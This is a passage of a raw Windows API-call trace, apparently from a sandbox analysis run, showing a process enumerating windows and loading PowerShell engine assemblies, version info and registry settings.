lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x458 [0086.699] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.699] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0x4ac [0086.700] GetWindowThreadProcessId (in: hWnd=0x40270, lpdwProcessId=0x16de20 | out: lpdwProcessId=0x16de20) returned 0xa8c [0086.700] GetWindow (hWnd=0x40270, uCmd=0x4) returned 0x0 [0086.701] IsWindowVisible (hWnd=0x40270) returned 1 [0086.704] WerSetFlags () returned 0x0 [0086.714] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0086.714] CoTaskMemFree (pv=0x0) [0086.715] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e188, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e180 | out: pulNumLanguages=0x16e188, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e180) returned 1 [0086.715] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e188, pwszLanguagesBuffer=0x2d82f90, pcchLanguagesBuffer=0x16e180 | out: pulNumLanguages=0x16e188, pwszLanguagesBuffer=0x2d82f90, pcchLanguagesBuffer=0x16e180) returned 1 [0086.721] CoTaskMemAlloc (cb=0x24) returned 0x2dd8d0 [0086.721] GetUserDefaultLocaleName (in: lpLocaleName=0x2dd8d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0086.721] CoTaskMemFree (pv=0x2dd8d0) [0086.744] CoTaskMemAlloc (cb=0x104) returned 0x266160 [0086.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x266160, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.744] CoTaskMemFree (pv=0x266160) [0086.746] CoTaskMemAlloc (cb=0x104) returned 0x266160 [0086.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x266160, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.746] CoTaskMemFree (pv=0x266160) [0086.748] CoTaskMemAlloc (cb=0x104) returned 0x266160 [0086.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x266160, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.748] CoTaskMemFree (pv=0x266160) [0086.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.758] SetErrorMode (uMode=0x1) returned 0x1 [0086.758] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16de00 | out: lpFileInformation=0x16de00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0086.758] SetErrorMode (uMode=0x1) returned 0x1 [0086.758] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16e070 | out: lpdwHandle=0x16e070) returned 0x94c [0086.759] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d86820 | out: lpData=0x2d86820) returned 1 [0086.760] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dfe8, puLen=0x16dfe0 | out: lplpBuffer=0x16dfe8*=0x2d868bc, puLen=0x16dfe0) returned 1 [0086.760] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86998, puLen=0x16df50) returned 1 [0086.760] lstrlenW (lpString="Microsoft Corporation") returned 21 [0086.760] CoTaskMemAlloc (cb=0x2e) returned 0x2e64a0 [0086.760] lstrcpyW (in: lpString1=0x2e64a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0086.760] CoTaskMemFree (pv=0x2e64a0) [0086.760] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d869ec, puLen=0x16df50) returned 1 [0086.760] lstrlenW (lpString="System.Management.Automation") returned 28 [0086.760] CoTaskMemAlloc (cb=0x3c) returned 0x2e78f0 [0086.761] lstrcpyW (in: lpString1=0x2e78f0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0086.761] CoTaskMemFree (pv=0x2e78f0) [0086.761] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86a48, puLen=0x16df50) returned 1 [0086.761] lstrlenW (lpString="6.1.7601.17514") returned 14 [0086.761] CoTaskMemAlloc (cb=0x20) returned 0x2dd930 [0086.761] lstrcpyW (in: lpString1=0x2dd930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0086.761] CoTaskMemFree (pv=0x2dd930) [0086.761] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86a88, puLen=0x16df50) returned 1 [0086.761] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0086.761] CoTaskMemAlloc (cb=0x44) returned 0x2e78f0 [0086.761] lstrcpyW (in: lpString1=0x2e78f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0086.761] CoTaskMemFree (pv=0x2e78f0) [0086.761] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86af0, puLen=0x16df50) returned 1 [0086.761] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0086.761] CoTaskMemAlloc (cb=0x76) returned 0x280930 [0086.761] lstrcpyW (in: lpString1=0x280930, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0086.762] CoTaskMemFree (pv=0x280930) [0086.762] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86b8c, puLen=0x16df50) returned 1 [0086.762] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0086.762] CoTaskMemAlloc (cb=0x44) returned 0x2e78f0 [0086.762] lstrcpyW (in: lpString1=0x2e78f0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0086.762] CoTaskMemFree (pv=0x2e78f0) [0086.762] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86bf0, puLen=0x16df50) returned 1 [0086.762] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0086.762] CoTaskMemAlloc (cb=0x58) returned 0x267360 [0086.762] lstrcpyW (in: lpString1=0x267360, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0086.762] CoTaskMemFree (pv=0x267360) [0086.762] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86c6c, puLen=0x16df50) returned 1 [0086.762] lstrlenW (lpString="6.1.7601.17514") returned 14 [0086.762] CoTaskMemAlloc (cb=0x20) returned 0x2dd930 [0086.762] lstrcpyW (in: lpString1=0x2dd930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0086.762] CoTaskMemFree (pv=0x2dd930) [0086.762] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x2d86914, puLen=0x16df50) returned 1 [0086.762] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0086.762] CoTaskMemAlloc (cb=0x66) returned 0x2dc1d0 [0086.762] lstrcpyW (in: lpString1=0x2dc1d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0086.762] CoTaskMemFree (pv=0x2dc1d0) [0086.762] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x0, puLen=0x16df50) returned 0 [0086.762] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x0, puLen=0x16df50) returned 0 [0086.763] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16df58, puLen=0x16df50 | out: lplpBuffer=0x16df58*=0x0, puLen=0x16df50) returned 0 [0086.763] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df28, puLen=0x16df20 | out: lplpBuffer=0x16df28*=0x2d868bc, puLen=0x16df20) returned 1 [0086.763] CoTaskMemAlloc (cb=0x204) returned 0x293930 [0086.763] VerLanguageNameW (in: wLang=0x0, szLang=0x293930, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0086.763] CoTaskMemFree (pv=0x293930) [0086.763] VerQueryValueW (in: pBlock=0x2d86820, lpSubBlock="\\", lplpBuffer=0x16df78, puLen=0x16df70 | out: lplpBuffer=0x16df78*=0x2d86848, puLen=0x16df70) returned 1 [0086.772] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0086.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.772] CoTaskMemFree (pv=0x2e4120) [0086.777] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0086.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.777] CoTaskMemFree (pv=0x2e4120) [0086.783] lstrlenW (lpString="䅁") returned 1 [0086.796] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de48 | out: phkResult=0x16de48*=0x310) returned 0x0 [0086.797] RegOpenKeyExW (in: hKey=0x310, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de38 | out: phkResult=0x16de38*=0x314) returned 0x0 [0086.797] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dec8 | out: phkResult=0x16dec8*=0x318) returned 0x0 [0086.800] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16de0c, lpData=0x0, lpcbData=0x16de08*=0x0 | out: lpType=0x16de0c*=0x1, lpData=0x0, lpcbData=0x16de08*=0x56) returned 0x0 [0086.801] CoTaskMemAlloc (cb=0x5a) returned 0x2dc160 [0086.801] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dddc, lpData=0x2dc160, lpcbData=0x16ddd8*=0x56 | out: lpType=0x16dddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ddd8*=0x56) returned 0x0 [0086.801] CoTaskMemFree (pv=0x2dc160) [0086.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.839] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0086.839] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.839] CoTaskMemFree (pv=0x2e4120) [0087.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0087.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0087.131] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.131] CoTaskMemFree (pv=0x2e4230) [0087.133] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.133] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.133] CoTaskMemFree (pv=0x2e4230) [0087.172] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.172] CoTaskMemFree (pv=0x2e4230) [0087.174] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.174] CoTaskMemFree (pv=0x2e4230) [0087.174] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.175] CoTaskMemFree (pv=0x2e4230) [0087.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0087.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0087.429] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.430] CoTaskMemFree (pv=0x2e4230) [0087.438] CoTaskMemAlloc (cb=0x104) returned 0x2e4230 [0087.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4230, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.438] CoTaskMemFree (pv=0x2e4230) [0087.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0087.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0088.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0088.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0088.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0088.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0088.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0088.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0088.826] CoTaskMemAlloc (cb=0x104) returned 0x2e4450 [0088.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4450, nSize=0x80 | out: lpBuffer="") returned 0x0 [0088.826] CoTaskMemFree (pv=0x2e4450) [0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16db50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0088.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0088.905] SetErrorMode (uMode=0x1) returned 0x1 [0088.905] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dda0 | out: lpFileInformation=0x16dda0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.906] SetErrorMode (uMode=0x1) returned 0x1 [0089.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.133] GetFullPathNameW (in: 